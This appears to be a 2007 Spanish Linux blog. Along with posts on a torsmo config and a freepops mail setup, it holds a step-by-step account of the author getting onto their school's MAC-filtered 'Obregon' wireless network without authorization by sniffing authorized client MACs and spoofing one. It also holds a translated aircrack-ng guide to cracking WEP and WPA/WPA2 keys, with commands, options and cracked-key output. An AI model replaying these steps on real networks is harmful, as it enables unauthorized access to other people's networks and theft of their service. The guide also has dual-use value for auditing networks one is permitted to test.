21 diciembre, 2007

Antenas Wifi caseras


Quien no quiere tener su antena wireless??? n_n

este es un manual muy bueno y muy completo sobre redes inalambricas desde teoria - practica y distintos tipos de antenas, de parte de la comunidad de linux cabal

http://www.linuxcabal.org/wire-es.pdf

05 diciembre, 2007

Red Obregon de Cucea

La red con nombre Obregon en mi escuela tiene un filtrado por mac, la red en si no esta encriptada pero solo ciertas mac estan autorizadas,
nota las mac adress han sido cambiadas en este documento

#Nos Logeamos como root

[neo@localhost ~]$ su -
Contraseña: lero lero no te digo


#activamos modo monitor

[root@localhost ~]# airmon-ng start eth1


Interface Chipset Driver

eth1 Centrino b/g ipw2200 (monitor mode enabled)

#capturamos trafico y miramos las mac adress
[root@localhost ~]# airodump-ng -w wifi eth1

CH 11 ][ Elapsed: 8 s ][ 0000-00-00 00:00

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

20:1C:10:2E:7D:D4 0 3 0 0 6 48 WPA TKIP PSK Flore
00:1B:2B:A7:B6:93 0 1 0 0 11 54. OPN Obreg
00:1B:94:54:AB:A3 0 18 0 0 11 54. OPN Obreg
00:1B:90:54:92:23 0 13 2 0 11 54. OPN Obreg
00:1B:90:54:BC:53 0 18 0 0 1 54. OPN Obreg
22:0E:D7:64:3E:9A 0 24 27 0 6 11. OPN Adeli B
44:1D:5A:8E:60:31 0 32 0 0 6 54. WEP WEP Orang
11:1B:90:54:59:33 0 5 0 0 1 54. OPN Obreg
11:1B:90:54:94:C3 0 6 0 0 1 54. OPN Obreg

BSSID STATION PWR Lost Packets Probes

11:1A:90:54:94:C3 12:14:51:AD:CC:42 -1 0 2
22:3A:D7:64:3E:9A 20:19:D2:11:CC:1B 0 26 11 Adelita
11:2A:D7:64:3E:9A 22:14:A5:E3:15:2A 0 12 9
22:4A:D7:64:fE:9A 12:29:7E:BB:39:69 0 0 18 Adelita



#ya que obtenemos la mac detenemos airodumb y detenemos el modo monitor
[root@localhost ~]# airmon-ng stop eth1


Interface Chipset Driver

eth1 Centrino b/g ipw2200 (monitor mode disabled)

#damos de alta el dispositivo de red eth1
[root@localhost ~]# ifconfig eth1 up

#cambiamos la Mac del dispositivo de red
[root@localhost ~]# ifconfig eth1 hw ether 00:11:22:34:5B:61

#Buscamos redes
[root@localhost ~]# iwlist eth1 scanning
eth1 Scan completed :
Cell 01 - Address: 00:11:90:44:11:22
ESSID:"Obregon"
Protocol:IEEE 802.11bg
Mode:Master
Channel:1
Frequency:2.412 GHz (Channel 1)
Encryption key:off
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 6 Mb/s; 9 Mb/s
11 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
48 Mb/s; 54 Mb/s
Quality=62/100 Signal level=-63 dBm
Extra: Last beacon: 240ms ago


#especificamos el essid o nombre de la red
[root@localhost ~]# iwconfig eth1 essid "Obregon"
#especificamos canal
[root@localhost ~]# iwconfig eth1 channel 1
#pedimos una ip con dhcp
[root@localhost ~]# dhclient eth1
Internet Systems Consortium DHCP Client V3.0.6
Copyright 2004-2007 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/

Listening on LPF/eth1/00:14:51:84:5b:61
Sending on LPF/eth1/00:14:51:84:5b:61
Sending on Socket/fallback
DHCPREQUEST on eth1 to 255.255.255.255 port 67
DHCPREQUEST on eth1 to 255.255.255.255 port 67
DHCPNAK from 1.1.1.1
DHCPDISCOVER on eth1 to 255.255.255.255 port 67 interval 8
receive_packet failed on eth1: Network is down
DHCPOFFER from 1.1.1.1
DHCPREQUEST on eth1 to 255.255.255.255 port 67
DHCPACK from 1.1.1.1
bound to 148.202.227.246 -- renewal in 41431 seconds.
[root@localhost ~]#


#Bingo! =) 10 megas para mi... bajar distros es divertidop n_n


02 diciembre, 2007

Torsmo Monitor del sistema


neoxfcebla5
Cargado originalmente por artzneoartzneo
El monitor de sistema torsmo es my practico y util he comenzado a utilizarlo y a arreglarle para instalarlo desde repositorios el paquete se llama torsmo

yo lo conosi por la distro de DSL

despues crear un archivo llamado .torsmorc en tu /home/usuario aqui l o configuramos . aqui les dejo el mio


background no


use_xft 1
xftfont Terminus :pixelsize=10
xftalpha 0.8

update_interval 0.5
own_window no
minimum_size 80 5
draw_shades yes
draw_outline no
draw_borders no
stippled_borders 0
border_margin 2
border_width 1
default_color white
default_shade_color black
default_outline_color black
#alignment top_left
alignment top_right
#alignment bottom_left
#alignment bottom_right
gap_x 5
gap_y 20
no_buffers yes
uppercase no

TEXT
${color purple} La tostadora de Neo


${color blue}${time Fecha, }${color }${time %e %B %G}
${color blue}${time Hora, }${color }${time %H:%M:%S}
${color grey}$hr
${execi 40000 cal}
${color red}$hr
${color slate yellow}Cpu Mem Procs ${color orange}
${execi 10 ps gaxo %cpu,%mem,comm | sort +0nr | head -n 10 | sed -e 's/-bin//' | sed -e 's/-media-play//'}
${color green}$hr$color
eth0 Up:$color ${upspeed eth0} k/s${color } - Down:$color ${downspeed eth0} k/s
Wifi Up:$color ${upspeed eth1} k/s${color } - Down:$color ${downspeed eth1} k/s
${color blue}$hr
${color yellow}Processes:$color $processes
${color yellow}CPU Usage:$color $cpu%
${color }${cpubar 3}
${color red}RAM Usage:$color $mem/$memmax - $memperc%
${color }${membar 3}
${color purple}Swap Used:$color $swap/$swapmax - $swapperc%
${color }${swapbar 3}
${color yellow}File systems:
/ $color${fs_free /}/${fs_size /}
${color }${fs_bar 3 /}
/home $color${fs_free /home/neo}/${fs_size /home/neo}
${color }${fs_bar 3 $HOME}
${color red}$hr
${color red}Uptime: $color $uptime
${color red}Battery: $color ${battery}
${color green}$hr$color
$sysname $kernel on $machine
${color white}Host: $color$nodename ${execi 180 ~/.torsmo_ip}

Thunderbird y Linuxmail.org con freepops

Bueno linuxmail.org es un servicio de correo electronico que es el que utilizo solo cuenta con fabulosos 5 megas , es antismap jeje se llena y rebota todo. lo que tengo aqui es

primero hay que instalar el freepops http://www.freepops.org/es/

instalamos

apt-get install freepops o smart install freepops o urpmi freepops depende de tu distro :P

una vez que lo instales ejecuta el demonio como root

freepopsd -p 2000

ahora agregamos la cuenta en thunderbird

agrega la cuenta pero en el servidor ponemos
localhost
y el puerto es el 2000
nombrede usuario tucuenta@linuxmail.org y listo =) ya puedes ver tu correo ahi

26 noviembre, 2007

Aircrack-ng Suite Guia

Aircrack-ng es un programa crackeador de claves 802.11 WEP y WPA/WPA2-PSK. Aircrack-ng puede recuperar la clave WEP una vez que se han capturado suficientes paquetes encriptados con airodump-ng. Este programa de la suite aircrack-ng lleva a cabo varios tipos de ataques para descubrir la clave WEP con pequeñas cantidades de paquetes capturados, combinando ataques estadísticos con ataques de fuerza bruta. Para crackear claves WPA/WPA2-PSK, es necesario usar un diccionario.

Captura de pantalla

LEYENDA
1 = Keybyte, es decir el número de cada uno de los bytes o caracteres de la clave.
2 = Profundidad de la actual búsqueda de la clave
3 = Byte o caracter que se está probando
4 = Votos o número de probabilidades de que sea correcto ese byte

¿Cómo funciona?

En esta página: Techniques Papers encontrarás muchos links a otras webs que tienen algunos manuales que describen estas técnicas de forma más detallada y como funcionan las matemáticas que hay detrás de ellas.

Múltiples técnicas se combinan para crackear la clave WEP:

  • Ataques FMS ( Fluhrer, Mantin, Shamir) - son técnicas estadísticas
  • Ataques Korek - tambien técnicas estadísticas
  • Fuerza bruta

Cuando se usan técnicas estadísticas para crackear claves WEP, cada byte de la clave es tratado de forma individual. Usando matemáticas estadísticas, la posibilidad de que encuentres un byte determinado de la clave crece algo más de un 15% cuando se captura el vector de inicialización (IV) correcto para ese byte de la clave. Esencialmente, ciertos IVs “revelan” algún byte de la clave WEP. Esto es básicamente en que consisten las técnicas estadísticas.

Usando una serie de pruebas estadísticas llamadas FMS y ataques Korek, se van acumulando posibilidades o votos (votes) para cada byte de la clave WEP. Cada ataque tiene un número diferente de votos asociado con él, por lo que la probabilidad de cada ataque varia matemáticamente. Cuantos más votos tengamos de un byte o valor particular, mayor probabilidad hay de que sea el correcto. Para cada byte de la clave, la pantalla nos muestra el caracter más probable y el número de votos que ha acumulado. Sobra decir, que la clave que tenga el mayor número de votos es la que más probabilidades tiene de ser la correcta, pero no está garantizado. Aircrack-ng probará continuamente de la más probable a la menos probable para encontrar la clave.

Usando un ejemplo entenderemos esto de forma más clara. En la anterior captura de pantalla, puedes ver, que para el primer caracter o byte 0, 0xAE ha obtenido unos cuantos votos, 50 exactamente. Entonces, matemáticamente, es más probable que la clave comience por AE que por 11 (el segundo valor en la misma linea) que es el siguiente con más posibilidades. Esta es la razón por la cual cuantos más paquetes tengas, más fácil será para aircrack-ng determinar la clave WEP.

La aproximación estadística puede por si sola darnos la clave WEP de la red. Pero la idea es que tambien podemos complementarlo con la fuerza bruta para realizar el trabajo. Aircrack-ng usa la fuerza bruta para determinar cuantas claves se han de probar para intentar encontrar la clave WEP.

Aquí es donde entra en juego el “fudge factor”. Basicamente el “fudge factor” le dice a aircrack-ng hasta donde probar claves. Es como si quisiesemos encontrar un balón diciéndole a alguien que el balón se puede encontrar entre 0 y 10 metros alrededor. Pero si le decimos que el balón se encuentra entre 0 y 100 metros alrededor. En este escenario de 100 metros le llevará mucho más tiempo realizar la búsqueda pero tendrá más posibilidades de encontrarlo.

Por ejemplo, si le decimos a aircrack-ng que use un fudge factor de 2, dividirá los votos del byte más probable, y probará todas las posibilidades con un número de votos de al menos la mitad de los que tiene el caracter más posible. Cuanto mayor sea el fudge factor, más posibilidades probará aircrack-ng aplicando fuerza bruta. Recuerda, que cuanto mayor sea el fudge factor, el número de claves a probar crecerá tremendamente y mayor será el tiempo que se esté ejecutando aircrack-ng. En cambio, cuantos más paquetes de datos tengas, minimizarás la necesidad de aplicar fuerza bruta a muchas claves, lo que hace que no trabaje tanto tiempo la CPU y se reduce mucho el tiempo necesario para encontrar la clave.

Al final, es todo “muy simple” matemáticas y fuerza bruta!

Las técnicas mencionadas hasta ahora no funcionan para claves WPA/WPA2 pre-shared. La única forma de crackear estas claves pre-compartidas (pre-shared) es a través de un ataque de diccionario. Esta capacidad está tambien incluida en aircrack-ng.

Con claves pre-compartidas, el cliente y el punto de acceso establecen las claves que se van a usar en sus comunicaciones al comienzo cuando el cliente se asocia por primera vez con el punto de acceso. Hay cuatro paquetes “handshake” entre el cliente y el punto de acceso. airodump-ng puede capturar estos cuatro paquetes handshake. Y usando un diccionario con una lista de palabras, aircrack-ng duplica los cuatro paquetes handshake para mirar si hay alguna palabra en el diccionario que coincida con el resultado de los cuatro paquetes handshake. Si lo consigues, habrás identificado de forma satisfactoria la clave pre-compartida.

Hay que resaltar que este programa hace un uso muy intensivo del procesador del ordenador, y que en la práctica claves WPA pre-compartidas muy largas o inusuales no podrán ser encontradas . Un buen diccionario te dará mejores resultados. Otra posibilidad es usar un pograma como “john the ripper” para generar contraseñas que podrán ser utilizadas por aircrack-ng.

Explicación de la profundidad (depth) y del Fudge Factor

La mejor explicación es un ejemplo. Nos fijaremos en un byte en concreto. Todos los bytes son tratados de la misma manera.

Tu tienes los votos (votes) como en la captura de pantalla anterior. Para el primer byte ves lo siguiente: AE(50) 11(20) 71(20) 10(12) 84(12)

Los AE, 11, 71, 10 y 84 son los valores posibles de la clave para el primer caracter (byte 0). Los números que están entre paréntesis son los votos que cada posible valor ha acumulado hasta ahora.

Ahora si decides usar un “fudge factor” de 3. Aircrack-ng realizará la siguiente operación a partir del byte que tiene más probabilidades o votos: AE(50):

50 / 3 = 16.666666

Aircrack-ng probará (fuerza bruta) todas las claves posibles que tengan un número de votos superior a 16.6666, resultando que

AE, 11, 71

serán utilizados, por lo que tenemos un número total de 3 valores a probar para ese byte o caracter (depth):

0 / 3 AE(50) 11(20) 71(20) 10(12) 84(12)

Cuando aircrack-ng está probando claves con AE, muestra 0 / 3, cuando acabe de probar todas las claves con ese byte, pasará al siguiente con más votos (11 en este ejemplo) y mostrará:

1 / 3 11(20) 71(20) 10(12) 84(12)

Uso

aircrack-ng [opciones] 

Puedes especificar múltiples archivos de captura (incluso mezclando formatos .cap y .ivs). También se puede ejecutar airodump-ng y aircrack-ng al mismo tiempo: aircrack-ng se actualizará de forma automática cuando estén disponibles nuevos IVs.

Aquí está la explicación para todas y cada una de las opciones disponibles:

OptionParam.Description
-aamodeFuerza el tipo de ataque (1 = WEP estática, 2 = WPA/WPA2-PSK).
-eessidSi se especifica, se usarán todos los IVs de las redes con el mismo ESSID. Está opción es necesaria para crackear claves WPA/WPA2-PSK si el ESSID está oculto.
-bbssidSelecciona el AP objetivo basándose en la dirección MAC.
-pnbcpuEn sistemas SMP, especifica con esta opción el número de CPUs usadas.
-qnoneActiva el modo silencioso (no muestra ninguna salida hasta que encuentra o no la clave).
-cnone(WEP cracking) Limita la búsqueda únicamente a caracteres alfanuméricos (0×20 - 0x7F).
-tnone(WEP cracking) Limita la búsqueda únicamente a caracteres hexadecimales codificados en binario.
-hnone(WEP cracking) Limita la búsqueda únicamente a caracteres numéricos (0×30-0×39). Estas claves numéricas son utilizadas por defecto por muchos APs y muchas compañias de ADSL.
-dstart(WEP cracking) Especifica el comienzo de la clave WEP (en hexadecimal).
-mmaddr(WEP cracking) Dirección MAC para la que filtrar los paquetes de datos WEP. Alternativamente, se puede especificar -m ff:ff:ff:ff:ff:ff para usar todos y cada uno de los IVs, sin preocuparnos de la red.
-nnbits(WEP cracking) Especifica la longitud de la clave: 64 para WEP de 40-bit, 128 para WEP de 104-bit, etc. La opción por defecto es 128.
-iindex(WEP cracking) Guarda solo los IVs que tienen este índice de clave (1 to 4). La opción predeterminada es ignorar el índice de clave.
-ffudge(WEP cracking) Por defecto, esta opción está fijada en 2 para WEP de 104-bit y en 5 para WEP de 40-bit. Especifica un valor más alto para para elevar el nivel de fuerza bruta: la obtención de la clave llevará más tiempo, pero la probabilidad de éxito será mayor.
-kkorek(WEP cracking) Hay 17 ataques korek de tipo estadístico. Algunas veces un ataque crea un falso positivo que evita que encontremos la clave, incluso con grandes cantidades de IVs. Prueba -k 1, -k 2, … -k 17 para ir desactivando cada uno de los ataques.
-x/-x0none(WEP cracking) No aplicar fuerza bruta sobre los dos últimos bytes de la clave (keybytes).
-x1none(WEP cracking) Aplicar fuerza bruta sobre el último byte de la clave (opción por defecto).
-x2none(WEP cracking) Aplicar fuerza bruta sobre los dos últimos bytes.
-Xnone(WEP cracking) No aplicar fuerza bruta con multiprocesadores (solo sistemas SMP).
-ynone(WEP cracking) Éste es un ataque de fuerza bruta experimental, que solo debe ser usado cuando el ataque estandard falle con más de un millón de IVs
-wwords(WPA cracking) Ruta al diccionario.

Ejemplos de uso

El caso más simple es crackear una clave WEP. Si quieres probar esto por ti mismo, aquí tienes un archivo de prueba. La clave de este archivo de prueba coincide con la de la pantalla anterior de este tutorial, pero no coincide con la del siguiente ejemplo.

aircrack-ng 128bit.ivs
Donde:

  • 128bit.ivs es el nombre del archivo que contiene los ivs.

El programa responde:

 Opening 128bit.ivs
Read 684002 packets.

# BSSID ESSID Encryption

1 00:14:6C:04:57:9B WEP (684002 IVs)

Choosing first network as target.

Si hay múltiplies redes en el archivo, entonces tendrás la opción de seleccionar la que quieras. Por defecto, aircrack-ng supone que la encriptación es de 128 bit.

El proceso de crackeo comienza, y una vez obtenida la clave, verás algo como esto:

                                              Aircrack-ng 0.7 r130


[00:00:10] Tested 77 keys (got 684002 IVs)

KB depth byte(vote)
0 0/ 1 AE( 199) 29( 27) 2D( 13) 7C( 12) FE( 12) FF( 6) 39( 5) 2C( 3) 00( 0) 08( 0)
1 0/ 3 66( 41) F1( 33) 4C( 23) 00( 19) 9F( 19) C7( 18) 64( 9) 7A( 9) 7B( 9) F6( 9)
2 0/ 2 5C( 89) 52( 60) E3( 22) 10( 20) F3( 18) 8B( 15) 8E( 15) 14( 13) D2( 11) 47( 10)
3 0/ 1 FD( 375) 81( 40) 1D( 26) 99( 26) D2( 23) 33( 20) 2C( 19) 05( 17) 0B( 17) 35( 17)
4 0/ 2 24( 130) 87( 110) 7B( 32) 4F( 25) D7( 20) F4( 18) 17( 15) 8A( 15) CE( 15) E1( 15)
5 0/ 1 E3( 222) 4F( 46) 40( 45) 7F( 28) DB( 27) E0( 27) 5B( 25) 71( 25) 8A( 25) 65( 23)
6 0/ 1 92( 208) 63( 58) 54( 51) 64( 35) 51( 26) 53( 25) 75( 20) 0E( 18) 7D( 18) D9( 18)
7 0/ 1 A9( 220) B8( 51) 4B( 41) 1B( 39) 3B( 23) 9B( 23) FA( 23) 63( 22) 2D( 19) 1A( 17)
8 0/ 1 14(1106) C1( 118) 04( 41) 13( 30) 43( 28) 99( 25) 79( 20) B1( 17) 86( 15) 97( 15)
9 0/ 1 39( 540) 08( 95) E4( 87) E2( 79) E5( 59) 0A( 44) CC( 35) 02( 32) C7( 31) 6C( 30)
10 0/ 1 D4( 372) 9E( 68) A0( 64) 9F( 55) DB( 51) 38( 40) 9D( 40) 52( 39) A1( 38) 54( 36)
11 0/ 1 27( 334) BC( 58) F1( 44) BE( 42) 79( 39) 3B( 37) E1( 34) E2( 34) 31( 33) BF( 33)

KEY FOUND! [ AE:66:5C:FD:24:E3:92:A9:14:39:D4:27:4B ]

Esta clave puede ser usada para conectarse a la red.

Ahora para crackear claves WPA/WPA2:

aircrack-ng -w password.lst *.cap
Donde:

  • -w password.lst es el nombre del diccionario con la lista de palabras. Recuerda que tienes que especificar la ruta completa si el archivo no se encuentra en el directorio actual.
  • *.cap es el nombre de los archivos que contienen los ivs. Date cuenta que en este caso usamos el comodín * para incluir múltiples archivos.

El programa responde:

 Opening wpa2.eapol.cap
Opening wpa.cap
Read 18 packets.

# BSSID ESSID Encryption

1 00:14:6C:7E:40:80 Harkonen WPA (1 handshake)
2 00:0D:93:EB:B0:8C test WPA (1 handshake)

Index number of target network ?

Date cuenta que en este caso como hay dos redes necesitamos seleccionar la que queremos atacar. Escogeremos la número 2. El programa entonces responde:

                               Aircrack-ng 0.7 r130


[00:00:03] 230 keys tested (73.41 k/s)


KEY FOUND! [ biscotte ]


Master Key : CD D7 9A 5A CF B0 70 C7 E9 D1 02 3B 87 02 85 D6
39 E4 30 B3 2F 31 AA 37 AC 82 5A 55 B5 55 24 EE

Transcient Key : 33 55 0B FC 4F 24 84 F4 9A 38 B3 D0 89 83 D2 49
73 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08
AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97
D9 6F 76 5B 8C D3 DF 13 2F BC DA 6A 6E D9 62 CD

EAPOL HMAC : 52 27 B8 3F 73 7C 45 A0 05 97 69 5C 30 78 60 BD

Ahora que sabemos la palabra, podremos conectarnos a la red.

Técnicas de uso

Aproximación general para crackear claves WEP

La forma más simple es escribir “aircrack-ng archivo.cap”. Tenemos que decir que hay algunas técnicas para aumentar las posibilidades de encontrar la clave WEP rápidamente. Pero no existe la magia. A continuación se describen algunos métodos para obtener la clave más rápido.

La mejor de todas las técnicas es capturar tantos paquetes como sea posible; cuantos más mejor. Esto es lo más sencillo y lo más importante. El número de vectores de inicialización (IVs) que se necesitan para obtener una clave WEP varia dependiendo de la longitud de la clave y del punto de acceso de que se trate. Habitualmente se necesitan 250,000 o más IVs para claves de 64 bit y 1.5 millones o más para claves de 128 bit. Y por supuesto que muchos más para claves más largas. Pero si tenemos suerte, hay veces que la clave WEP se puede obtener con 50,000 IVs o menos. Aunque esto no ocurre con frecuencia. Y al revés, habrá veces en las que se necesitarán varios millones de IVs para crackear la clave WEP. El número de IVs necesarios es muy dificil de predecir porque la mayoría de los puntos de acceso actuales funcionan muy bien y no generan IVs débiles que revelen parte de la clave WEP.

Generálmente, no intentes crackear la clave WEP hasta que tengas 200,000 o más IVs. Si lo ejecutas con pocos IVs, aircrack probará muchas claves durante mucho tiempo y no aplicará las técnicas estadísticas de forma adecuada. Puedes empezar probando con claves de 64 bit “aircrack-ng -n 64 archivo.cap”. Si se está usando una clave WEP de 64 bit, normalmente será crackeada en menos de 5 minutos (y con frecuencia en menos de 60 segundos) con pocos IVs. Es sorprendente que haya tantos APs que usan claves de 64 bit. Si no encuentras la clave de 64 bit en 5 minutos, reinicia aircrack con el modo genérico: “aircrack-ng archivo.cap”. Y cada vez que tengas 100,000 IVs más, reintenta “aircrack-ng -n 64 archivo.cap” y déjalo 5 minutos.

Cuando llegues a 600,000 IVs, cambia y empieza a probar claves de 128 bit. Sería extraño (pero no imposible) que fuese una clave de 64 bit y no se diese crackeado con 600,000 IVs. Por lo tanto ahora prueba “aircrack-ng archivo.cap”.

Cuando llegues a 2 millones de IVs, prueba a cambiar el fudge factor a ”-f 4”. Y déjalo entre 30 minutos y una hora. Reintenta aumentando el fudge factor sumando 4 de cada vez. Otra buena ocasión para aumentar el fudge factor es cuando aircrack-ng se para porque ha probado todas las claves.

Y mientras tanto, no te olvides de seguir capturando paquetes de datos. Recuerda la regla de oro, “cuantos más IVs mucho mejor”.

También lee la siguiente sección sobre como determinar las mejores opciones a usar. Esto te puede ayudar tambien a acelerar el proceso de obtención de la clave WEP. Por ejemplo, si la clave es numérica, podremos crackear la clave WEP con muchísimos menos IVs si usamos la opción ”-t”. Entonces, si averiguas algo acerca de la naturaleza de la clave WEP, es sencillo probar algunas variaciones para tener éxito.

Como determinar las mejores opciones a usar

Mientras aircrack-ng se está ejecutando, frecuentemente solo puedes ver el comienzo de la clave en la primera columna. Aunque no conoces la clave WEP, esta información puede darte pistas sobre cual es la clave. si un caracter o byte de la clave tiene un número muy grande de votos, hay un 99.5% de posibilidades de que sea correcto. Vamos a ver que se puede hacer con estas pistas.

Si los bytes son por ejemplo: 75:47:99:22:50 entonces es obvio que la clave está formada solo por números, como los 5 primeros bytes. Por lo tanto obtendremos la clave mucho antes y con menos IVs usando la opción -t para probar únicamente este tipo de claves. Mira Wikipedia Binary Coded Decimal para ver una descripción de los caracteres que busca la opción -t.

Si los bytes son 37:30:31:33:36 estos son todos valores numéricos si los convertimos a Ascii (70136). En este caso, es una buena idea usar la opción -h. El link del FAQ Converting hex characters to ascii te da información para relacionar los caracters hexadecimales con los Ascii. De todas formas sabremos muy fácilmente que se trata de caracteres numéricos porque veremos que empiezan todos los bytes por 3.

Y si los primeros bytes son algo como esto 74:6F:70:73:65, deberias de introducir esos valores en tu editor hexadecimal favorito o en alguno de los links proporcionados anteriormente, y verás, que puede ser el comienzo de alguna palabra, por lo que parece que está usando una clave ASCII; en esta situación activa la opción -c para probar únicamente con claves ASCII.

Otras pistas

Para procesar varios archivos al mimso tiempo, se puede usar un cmodín como el * o especificar cada archivo uno por uno.

Ejemplos:

  • aircrack-ng -w password.lst wpa.cap wpa2.eapol.cap
  • aircrack-ng *.ivs
  • aircrack-ng archi*.ivs

Determinar una clave WPA/WPA2 depende absolutamente de que la palabra se encuentre en el diccionario que usemos. Por lo que es muy importante usar un buen diccionario. Puedes buscar en Internet algún diccionario. Hay varios disponibles.

Como has visto, si hay varias redes en tus archivos necesitarás elegir la que quieres crackear. En lugar de hacerlo manualmente, puedes especificar la red que quieras en la linea de comandos indicando su essid o su bssid. Esto se hace con las opciones -e o -b.

Otra alternativa es usar “John the Ripper” para crear un diccionario específico. Si sabes que la palabra clave es el nombre de una calle además de 3 digitos. Puedes crear una regla en JTR y ejecutar un comando como este:

 john --stdout --wordlist=specialrules.lst --rules | aircrack-ng -e test -a 2 -w - /root/capture/wpa.cap

Problemas de uso

Mensaje de error "Please specify a dictionary (option -w)"

Esto significa que no tienes ese archivo de diccionario o que no se encuentra en el directorio actual. Si el diccionario se encuentra en otra carpeta, debes escribir la ruta completa al diccionario.

Votos negativos

Hay ocasiones en que los bytes tienen votos negativos. Y si tienes un montón de votos negativos significa que algo va mal. Lo más probable es que estés intentando crackear una clave dinámica o que han cambiado la clave WEP mientras estabas capturando paquetes de datos. Recuerda que WPA/WPA2 solo puede ser crackeada con un diccionario. Si han cambiado la clave WEP, tendrás que empezar a capturar paquetes de nuevo desde el principio.

Airodump-ng

Descripción

Airodump-ng se usa para capturar paquetes wireless 802.11 y es útil para ir acumulando vectores de inicialización IVs con el fin de intentar usarlos con aircrack-ng y obtener la clave WEP. Si tienes un receptor GPS conectado al ordenador, airodump-ng es capaz de mostrar las coordenadas de los puntos de acceso que vaya encontrando.

Uso

Antes de ejecutar airodump-ng, tienes que mirar con el script airmon-ng la lista de tus interfaces wireless detectadas. Es posible, pero no recomendable, ejecutar Kismet y airodump-ng al mismo tiempo.

uso: airodump-ng  [,,...]

Opciones:
--ivs : Graba únicamente los IVs capturados
--gpsd : Usa GPSd
--w : Nombre del archivo donde guardar las capturas
-write : Lo mismo que --w
--beacons : Guardar todas las balizas o beacons en el archivo
--netmask : Filtrar APs por máscara
--bssid : Filtrar APs por BSSID

Por defecto, airodump-ng va saltando alrededor de los canales 2.4Ghz.
Puedes capturar en un canal específico usando:
--channel : Capturar en un canal específico
--band : Banda en la que actuará airodump-ng
--cswitch : Saltar de canal con este método:
0 : FIFO (opción por defecto)
1 : Round Robin
2 : Saltar al último
-s : Lo mismo que --cswitch

Puedes convertir archivos .cap / .dump a formato .ivs o juntarlos.

Pistas de uso

¿Cual es el significado de los datos mostrados por airodump-ng?

airodump-ng nos mostrará una lista de los puntos de acceso detectados, y también una lista de los clientes conectados (“stations”). Como ejemplo puedes ver la siguiente captura de pantalla:

 CH  9 ][ Elapsed: 4 s ][ 2007-02-25 16:47

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:09:5B:1C:AA:1D 11 16 10 0 0 11 54. OPN NETGEAR
00:14:6C:7A:41:81 34 100 57 14 1 9 11 WEP WEP bigbear

BSSID STATION PWR Lost Packets Probes

00:14:6C:7A:41:81 00:0F:B5:32:31:31 51 2 14
(not associated) 00:14:A4:3F:8D:13 19 0 4 mossy
00:14:6C:7A:41:81 00:0C:41:52:D1:D1 -1 0 5
FieldDescripción
BSSIDDirección MAC del punto de acceso.
PWRNivel de señal. Su significado depende del driver que usemos, pero cuanto mayor sea el PWR más cerca estaremos del AP o del cliente. Si el PWR es -1, significa que el driver no soporta la detección del nivel de señal. Si el PWR es -1 para algunos clientes (stations) es porque los paquetes proceden del AP hacia el cliente pero las transmisiones del cliente se encuentran fuera del rango de cobertura de tu tarjeta. Lo que significa que solo escuchas la mitad de la comunicación. Si todos los clientes tienen PWR -1 significa que el driver no tiene la cpacidad de detectar el nivel de señal.
RXQCalidad de recepción calculada a través del porcentaje de paquetes (management y paquetes de datos) recividos correctamente en los últimos 10 segundos. Mira la nota para una explicación más detallada.
BeaconsNúmero de “paquetes anucio” o beacons enviadas por el AP. Cada punto de acceso envia alrededor de diez beacons por segundo cuando el rate o velocidad es de 1M, (la más baja) de tal forma que se pueden recibir desde muy lejos.
# DataNúmero de paquetes de datos capturados (si tiene clave WEP, equivale tambien al número de IVs), incluyendo paquetes de datos broadcast (dirigidos a todos los clientes).
#/sNúmero de paquetes de datos capturados por segundo calculando la media de los últimos 10 segundos.
CHNúmero de canal (obtenido de los “paquetes anuncio” o beacons).
Nota: Algunas veces se capturan paquetes de otros canales, incluso si airodump-ng no está saltando de canal en canal, debido a interferencias o solapamientos en la señal.
MBVelocidad máxima soportada por el AP. Si MB = 11, es 802.11b, si MB = 22es 802.11b+ y velocidades mayores son 802.11g. El punto (despues del 54) indica que esa red soporta un preámbulo corto o “short preamble”.
ENCAlgoritmo de encriptación que se usa. OPN = no existe encriptación (abierta),”WEP?” = WEP u otra (no se han capturado suficientes paquetes de datos para saber si es WEP o WPA/WPA2), WEP (sin el interrogante) indica WEP estática o dinámica, y WPA o WPA2 en el caso de que se use TKIP o CCMP.
CIPHERDetector cipher. Puede ser CCMP, WRAP, TKIP, WEP, WEP40, o WEP104.
AUTHEl protocolo de autenticación usado. Puede ser MGT, PSK (clave precompartida), o OPN (abierta).
ESSIDTambien llamado “SSID”, que puede estar en blanco si la ocultación del SSID está activada en el AP. En este caso, airodump-ng intentará averiguar el SSID analizando paquetes “probe responses” y “association requests” (son paquetes enviados desde un cliente al AP).
STATIONDirección MAC de cada cliente asociado. En la captura de pantalla, vemos que se han detectado dos clientes (00:09:5B:EB:C5:2B y 00:02:2D:C1:5D:1F).
LostEl número de paquetes perdidos en los últimos 10 segundos.
PacketsEl número de paquetes de datos enviados por el cliente.
ProbesLos ESSIDs a los cuales ha intentado conectarse el cliente.

NOTAS:

RXQ: Se calcula a partir de los paquetes de datos y management. Supongamos que tienes 100% de RXQ y recibes 10 (o cualquier otra cantidad) beacons por segundo. Ahora de repente el RXQ baja a 90, pero todavía capturas las mismas beacons. Esto significa que el AP está enviando paquetes a un cliente pero no puedes escuchar o capturar los paquetes que salen del cliente hacia el AP (necesitas acercarte más al cliente). Otra situación puede ser, que tengas una tarjeta de 11MB (por ejemplo una prism2.5) y estes cerca del AP. Pero el AP está configurado en modo únicamente de 54MBit y tambien el RXQ disminuye, en este caso sabrás que hay conectado al menos un cliente a 54MBit.

Problemas de uso

airodump-ng cambia entre WEP y WPA

Esto ocurre porque tu driver no descarta los paquetes corruptos (que tienen un CRC inválido). Si es una ipw2100 (Centrino b), no tiene solución; por lo que deberías comprar una tarjeta mejor. Si es una Prism2, prueba a actualizar el firmware. En la sección de tutorials tienes un manual en castellano de como actualizar el firmware Prism.

airodump-ng no muestra ningún dato

Con el driver madwifi-ng asegúrate de que no hay otras VAPs activas. Hay problemas cuando se crea una nueva VAP en modo monitor y ya había otra VAP en modo managed.

Tienes que parar primero ath0 y despues iniciar wifi0:

 airmon-ng stop ath0
airmon-ng start wifi0

o

 wlanconfig ath0 destroy
wlanconfig ath create wlandev wifi0 wlanmode monitor


Cambiaremos la mac del equipo:

ifconfig eth1 hw ether 00:11:22:33:44:55

